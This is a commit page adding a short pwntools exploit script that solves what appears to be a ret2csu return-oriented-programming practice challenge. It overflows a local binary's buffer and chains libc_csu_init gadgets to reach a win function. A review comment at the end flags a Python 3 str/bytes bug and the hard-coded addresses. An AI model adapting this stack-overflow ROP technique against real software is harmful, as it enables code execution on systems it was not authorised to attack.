exploit for ret2csu
AravGarg authored Mar 30, 2020
1 parent d3415ec commit 14a198f
Showing 1 changed file with 30 additions and 0 deletions.
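--- a/ret2csu.py
+++ b/ret2csu.py
@@ -0,0 +1,30 @@
+from pwn import *
+target=process('./ret2csu')
+print(target.recv())
+
+csu1=0x40089a
+csu2=0x400880
+initptr=0x600e38
+ret2win=0x4007b1
+
+payload="A"*40
+payload+=p64(csu1)
+payload+=p64(0x0)
+payload+=p64(0x1)
+payload+=p64(initptr)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xdeadcafebabebeef)
+payload+=p64(csu2)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(0xf)
+payload+=p64(ret2win)
+
+target.sendline(payload)
+target.interactive()
+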
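Review bot: `payload="A"*40` starts the buffer as a `str`, while each `p64(...)` appended after it returns `bytes` under Python 3, so the first `payload+=` would raise `TypeError` there; `payload = b"A"*40` keeps the whole buffer as bytes. The constants `csu1`, `csu2`, `initptr` and `ret2win` and the 40-byte offset are undocumented and hold only for one particular build of `./ret2csu`. They look like fixed non-PIE addresses, so a header comment such as `# addresses valid only for ./ret2csu sha256=<SHA256_PLACEHOLDER>, built without PIE` would tell a reader when the script no longer applies, for example once the binary is rebuilt as PIE with ASLR enabled. `print(target.recv())` returns whatever has arrived at that moment, so the banner may be printed only partially.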